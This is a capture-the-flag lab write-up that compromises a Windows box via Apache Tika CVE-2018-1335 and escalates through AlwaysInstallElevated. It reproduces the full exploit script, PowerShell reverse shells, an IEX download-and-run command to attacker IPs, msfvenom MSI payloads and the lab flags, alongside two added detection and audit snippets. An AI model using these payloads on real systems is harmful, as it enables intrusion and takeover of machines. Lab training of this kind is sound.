Cyber Lens
Scanning
# Nmap 7.94SVN scan initiated Mon Feb 17 08:13:49 2025 as: nmap -sC -sV -oN nmap 10.10.182.183
Nmap scan report for cyberlens.thm (10.10.182.183)
Host is up (0.051s latency).
Not shown: 995 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.57 ((Win64))
|_http-server-header: Apache/2.4.57 (Win64)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: CyberLens: Unveiling the Hidden Matrix
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: CYBERLENS
| NetBIOS_Domain_Name: CYBERLENS
| NetBIOS_Computer_Name: CYBERLENS
| DNS_Domain_Name: CyberLens
| DNS_Computer_Name: CyberLens
| Product_Version: 10.0.17763
|_ System_Time: 2025-02-17T13:14:12+00:00
| ssl-cert: Subject: commonName=CyberLens
| Not valid before: 2025-02-16T12:31:00
|_Not valid after: 2025-08-18T12:31:00
|_ssl-date: 2025-02-17T13:14:23+00:00; 0s from scanner time.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2025-02-17T13:14:14
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Feb 17 08:14:24 2025 -- 1 IP address (1 host up) scanned in 34.99 seconds
I have 5 ports: 80 http, 135 msrpc, 139 netbios-ssn, 445 microsoft-ds? and 3389 ms-wbt-server.
Now during the challenge, I did not know much about the Windows environment, so with the help of ChatGPT I searched and learned about each of the ports I did not know, because each of them could be an attack vector or be used during the exploitation process in one way or another.
Web enumeration
I started my enumeration process with the website, which seems pretty basic, with a single functionality to extract metadata from an uploaded image.
The next thing is to upload a random image and see how the function extracts the metadata. The function generated a long output, but nothing interesting in the image metadata, as I uploaded a random image.
Now I want to understand how the function works, starting by looking for it in the page source.
Analyzing the page source I can clearly see the script and the endpoint it contacts to examine the image metadata.
document.addEventListener("DOMContentLoaded", function() {
    document.getElementById("metadataButton").addEventListener("click", function() {
        var fileInput = document.getElementById("imageFileInput");
        var file = fileInput.files[0];
        var reader = new FileReader();
        reader.onload = function() {
            var fileData = reader.result;
            fetch("http://cyberlens.thm:61777/meta", {
                method: "PUT",
                body: fileData,
                headers: {
                    "Accept": "application/json",
                    "Content-Type": "application/octet-stream"
                }
            })
            .then(response => {
                if (response.ok) {
                    return response.json();
                } else {
                    throw new Error("Error: " + response.status);
                }
            })
            .then(data => {
                var metadataOutput = document.getElementById("metadataOutput");
                metadataOutput.innerText = JSON.stringify(data, null, 2);
            })
            .catch(error => {
                console.error("Error:", error);
            });
        };
        reader.readAsArrayBuffer(file);
    });
});
The endpoint is http://cyberlens.thm:61777/ and to access it I have to update my /etc/hosts file:
127.0.0.1 localhost
127.0.1.1 kali
10.10.158.180 cyberlens.thm
# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
By visiting the URL I can see all the methods, the server name and the version.
By searching the server name and the version in searchsploit a CVE pops up.
$ searchsploit apache tika 1.17
----------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------------------- ---------------------------------
Apache Tika 1.15 - 1.17 - Header Command Injection (Metasploit) | windows/remote/47208.rb
Apache Tika-server < 1.18 - Command Injection | windows/remote/46540.py
----------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Here my first choice is 46540.py, because it is Python and it is not a Metasploit module, meaning I can use it almost out of the box.
Remote code execution (RCE)
######################################################################################################
#Description: This is a PoC for remote command execution in Apache Tika-server.
#Versions Affected: Tika-server versions < 1.18
#Researcher: David Yesland Twitter: @Daveysec
#Blog Link: https://rhinosecuritylabs.com/application-security/exploiting-cve-2018-1335-apache-tika
#NIST CVE Link: https://nvd.nist.gov/vuln/detail/CVE-2018-1335
######################################################################################################
import sys
import requests

if len(sys.argv) < 4:
    print "Usage: python CVE-2018-1335.py <host> <port> <command>"
    print "Example: python CVE-2018-1335.py localhost 9998 calc.exe"
else:
    host = sys.argv[1]
    port = sys.argv[2]
    cmd = sys.argv[3]
    url = host + ":" + str(port) + "/meta"
    headers = {"X-Tika-OCRTesseractPath": "\"cscript\"",
               "X-Tika-OCRLanguage": "//E:Jscript",
               "Expect": "100-continue",
               "Content-type": "image/jp2",
               "Connection": "close"}
    jscript = '''var oShell = WScript.CreateObject("WScript.Shell");
var oExec = oShell.Exec('cmd /c {}');'''.format(cmd)
    # Try HTTPS first and fall back to plain HTTP.
    try:
        requests.put("https://" + url, headers=headers, data=jscript, verify=False)
    except:
        try:
            requests.put("http://" + url, headers=headers, data=jscript)
        except:
            print "Something went wrong. Usage: python CVE-2018-1335.py <host> <port> <command>"
The exploit is pretty simple to understand: all it needs is the remote host, the remote port and the command to execute. I will test it by executing a simple command such as dir. Note that the script is written in Python 2, so make sure to use that version of Python and give execution permission to the script:
chmod +x 46540.py
After executing the command
$ python2 46540.py cyberlens.thm 61777 dir
I did not receive any response from the server. This makes me think that the code runs but the output is not reported back to me. I can test whether the code is successfully executed by trying to download a file from my Kali box: if my web server receives a connection from the target host, it means the code was successfully executed. To test this I will use the command curl.
Here I can clearly see the successful execution of the code, as I received the connection back from the target machine to my web server. Now I have to craft a payload to get a reverse shell.
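Seen from the defender's side, the request this exploit sends is easy to recognise: a Tika endpoint should never be told by the client which OCR binary to run, and the OCR language should be a plain language code. The detector below is an added example, not part of the writeup or of Tika itself; the parse_request and tika_ocr_findings names and the two sample requests are constructed for it.

```python
import re

# Binary names a legitimate OCR configuration would point at.
TESSERACT_NAMES = {"tesseract", "tesseract.exe"}
# Tesseract language codes: three-letter tags, optionally joined with '+' (e.g. eng+deu).
LANG_RE = re.compile(r"^[a-z]{3}(\+[a-z]{3})*$")

def parse_request(raw):
    """Return (method, path, headers) from a raw HTTP/1.1 request; header names lower-cased."""
    head = raw.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    method, path = request_line.split(" ")[:2]
    headers = {}
    for line in header_lines:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return method, path, headers

def tika_ocr_findings(raw):
    """Explain why a request looks like OCR-configuration abuse; empty list means nothing odd."""
    method, path, headers = parse_request(raw)
    findings = []
    tess = headers.get("x-tika-ocrtesseractpath")
    if tess is not None:
        # Strip quotes and any directory part, then compare the bare program name.
        binary = re.split(r"[\\/]", tess.strip().strip("\"'"))[-1].lower()
        if binary not in TESSERACT_NAMES:
            findings.append("tesseract path overridden to %r" % tess)
    lang = headers.get("x-tika-ocrlanguage")
    if lang is not None and not LANG_RE.match(lang):
        findings.append("OCR language is not a language code: %r" % lang)
    if findings:
        findings.insert(0, "%s %s carries client-side OCR configuration" % (method, path))
    return findings

# Constructed request mirroring the header pattern of the exploit above (body omitted).
SUSPICIOUS = (
    "PUT /meta HTTP/1.1\r\n"
    'X-Tika-OCRTesseractPath: "cscript"\r\n'
    "X-Tika-OCRLanguage: //E:Jscript\r\n"
    "Content-Type: image/jp2\r\n\r\n"
)
# Constructed request from a client that only selects OCR languages.
BENIGN = (
    "PUT /meta HTTP/1.1\r\n"
    "X-Tika-OCRLanguage: eng+deu\r\n"
    "Content-Type: image/png\r\n\r\n"
)
```

Run against captured requests from a reverse proxy in front of tika-server, a non-empty result is worth an alert; upgrading past 1.17 removes the root cause.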
Shell as CyberLens
The idea here is to give a command to receive a reverse shell, but if I write the reverse shell directly in the following way:
$ python2 46540.py cyberlens.thm 61777 'powershell -c "$client = New-Object System.Net.Sockets.TCPClient("10.0.2.4",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"'
This gives errors, as the mix of single and double quotes messes up the outermost single quotes that enclose the PowerShell command. I also tried to encode the command in Base64 in the following way, and it was also giving me errors due to the mixture of single and double quotes.
$Text = 'Code to encode'
$Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text)
$EncodedText = [Convert]::ToBase64String($Bytes)
$EncodedText
$client = New-Object System.Net.Sockets.TCPClient("10.10.14.84", 4444);
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535 | %{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) {
$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes, 0, $i);
$sendback = (iex $data 2>&1 | Out-String);
$sendback2 = $sendback + "# ";
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
$stream.Write($sendbyte, 0, $sendbyte.Length);
$stream.Flush();
}
$client.Close();
Saving the reverse shell above as rev.ps1 and serving it over HTTP from my machine, the command passed to the exploit only needs to download and execute it:
python2 46540.py cyberlens.thm 61777 'powershell -command "IEX(New-Object Net.WebClient).downloadString('http://10.21.112.161:8000/rev.ps1')"'
To avoid any quoting error I will encode the PowerShell command in Base64:
$payload = "IEX(New-Object Net.WebClient).downloadString('http://10.21.112.161:8000/rev.ps1')"
$Bytes = [System.Text.Encoding]::Unicode.GetBytes($payload)
$EncodedText = [Convert]::ToBase64String($Bytes)
$EncodedText
SQBFAFgAKABOA[...REDACTED...]gBlAHYALgBwAHMAMQAnACkA
Navigating to the Desktop of the current user I can find the flag.
$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.21.112.161] from (UNKNOWN) [10.10.133.177] 49860
C:\Windows\system32> cd C:/
C:\> cd /Users
C:\Users> cd CyberLens/Desktop
C:\Users\CyberLens\Desktop> dir
Directory: C:\Users\CyberLens\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 6/21/2016 3:36 PM 527 EC2 Feedback.website
-a---- 6/21/2016 3:36 PM 554 EC2 Microsoft Windows Guide.website
-a---- 6/6/2023 7:54 PM 25 user.txt
C:\Users\CyberLens\Desktop> type user.txt
THM{T1k4-CV3-f0r-7h3-w1n}
The next step is to do privilege escalation.
Enumeration
One trick that I learnt from a friend of mine is the command tree. I use this command all the time for my personal use. I'm not sure why I didn't think of it earlier; it is so helpful and makes the search easy, and it is easy to visualise all the files.
$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.21.112.161] from (UNKNOWN) [10.10.77.142] 49757
C:\Windows\system32> cd C:/Users
C:\Users> tree /f
Folder PATH listing
Volume serial number is A8A4-C362
C:.
├───Administrator
├───CyberLens
│   ├───3D Objects
│   ├───Contacts
│   ├───Desktop
│   │       EC2 Feedback.website
│   │       EC2 Microsoft Windows Guide.website
│   │       user.txt
│   │
│   ├───Documents
│   │   └───Management
│   │           CyberLens-Management.txt
│   │
│   ├───Downloads
│   ├───Favorites
│   │   │   Bing.url
│   │   │
│   │   └───Links
│   ├───Links
│   │       Desktop.lnk
│   │       Downloads.lnk
│   │
│   ├───Music
│   ├───Pictures
│   ├───Saved Games
│   ├───Searches
│   └───Videos
└───Public
    ├───Documents
    ├───Downloads
    ├───Music
    ├───Pictures
    └───Videos
C:\Users> type CyberLens\Documents\Management\CyberLens-Management.txt
Remember, manual enumeration is often key in an engagement ;)
CyberLens
HackSmarter123
Listing the file structure, the only interesting file is CyberLens-Management.txt, which contains credentials. Thinking about the Nmap scan, the only other service where I can use credentials is the Remote Desktop Protocol (RDP). The RDP program that I will use is xfreerdp, but remmina is also a very good alternative that I love to use.
xfreerdp /u:CyberLens /p:HackSmarter123 /v:10.10.77.142 +clipboard
Privilege escalation
For the privilege escalation I used WinPEAS: I copied the raw text from GitHub and pasted it into a new file, saving it with the .bat extension.
I ran the script from PowerShell, which I prefer as it has a smaller font.
After spending some time analysing the output, testing things and failing, I found a misconfiguration.
You can find more details about this vulnerability on GitHub.
"AlwaysInstallElevated" is a Windows Registry setting that affects the behavior of the Windows Installer service. The vulnerability arises when the "AlwaysInstallElevated" registry key is configured with a value of "1" in the Windows Registry. When this registry key is enabled, it allows non-administrator users to install software packages with elevated privileges. In other words, users who shouldn't have administrative rights can exploit this vulnerability to execute arbitrary code with elevated permissions, potentially compromising the security of the system.
What the description is saying is that with that flag enabled, the installation of software is performed with high privileges even when the installation is launched by a low-privileged account. Now it becomes clear that I have to create a malicious installation file with the .msi extension to elevate my privileges.
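The setting only takes effect when the value is 1 under both HKLM and HKCU, so an audit has to read both keys and treat a missing value as 0. The helper below is an added example, not part of the writeup: it parses the output of reg query for the two policy keys and reports whether the weakness is actually live; the function names and the sample reg.exe output are constructed for this example.

```python
import re

# Both policy locations consulted by Windows Installer; the setting is effective only when both are 1.
KEYS = {
    "HKLM": r"HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer",
    "HKCU": r"HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer",
}
# Matches the value line printed by: reg query <key> /v AlwaysInstallElevated
VALUE_RE = re.compile(r"^\s*AlwaysInstallElevated\s+REG_DWORD\s+(0x[0-9a-fA-F]+|\d+)\s*$", re.M)

def reg_query_commands():
    """Commands to run on the host to capture the two inputs for the audit."""
    return ['reg query "%s" /v AlwaysInstallElevated' % KEYS[k] for k in ("HKLM", "HKCU")]

def parse_reg_query(output):
    """Return the DWORD from captured 'reg query' output, or None when reg.exe reports it missing."""
    if output.lstrip().startswith("ERROR:"):
        return None
    m = VALUE_RE.search(output)
    return int(m.group(1), 0) if m else None

def audit_always_install_elevated(hklm_output, hkcu_output):
    """Combine both queries: the weakness is live only if HKLM and HKCU are both set to 1."""
    values = {"HKLM": parse_reg_query(hklm_output), "HKCU": parse_reg_query(hkcu_output)}
    return {"values": values, "effective": all(v == 1 for v in values.values())}

# Constructed reg.exe output as captured on a host where both policies are enabled.
HKLM_OUT = (
    "\r\nHKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer\r\n"
    "    AlwaysInstallElevated    REG_DWORD    0x1\r\n\r\n"
)
HKCU_OUT = HKLM_OUT.replace("HKEY_LOCAL_MACHINE", "HKEY_CURRENT_USER")
# Constructed output for a host where the per-user policy was never set.
HKCU_MISSING = "\r\nERROR: The system was unable to find the specified registry key or value.\r\n"
```

Remediation is to set both values to 0 (or disable the "Always install with elevated privileges" policy for both Computer and User Configuration in Group Policy) and re-run the audit.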
To create a malicious Windows installation file I can use Msfvenom with the following command:
$ msfvenom -p windows/shell_reverse_tcp lhost=10.21.112.161 lport=3333 -f msi > reverse.msi
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of msi file: 159744 bytes
The next step is to upload reverse.msi to the target Windows machine via a Python web server and the command curl.
First, I will open a Python web server in the same folder as reverse.msi:
$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.232.185 - - [23/Feb/2025 06:36:44] "GET /reverse.msi HTTP/1.1" 200 -
I will also open a Netcat listener on my Kali on port 3333, the same port specified during the creation of the .msi file:
nc -lvnp 3333
Now from the target machine, I will download the file with curl and execute it.
C:\Users\CyberLens>curl http://10.21.112.161:8000/reverse.msi --output reverse.msi
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 156k 100 156k 0 0 156k 0 0:00:01 --:--:-- 0:00:01 369k
Upon executing the installation file a warning message is prompted; just press "OK" to receive the reverse shell on the Netcat listener on port 3333 opened previously.
$ nc -lvnp 3333
listening on [any] 3333 ...
connect to [10.21.112.161] from (UNKNOWN) [10.10.232.185] 49811
Microsoft Windows [Version 10.0.17763.1821]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Users>cd Administrator
cd Administrator
C:\Users\Administrator>cd Desktop
cd Desktop
C:\Users\Administrator\Desktop>type admin.txt
type admin.txt
THM{3lev@t3D-4-pr1v35c!}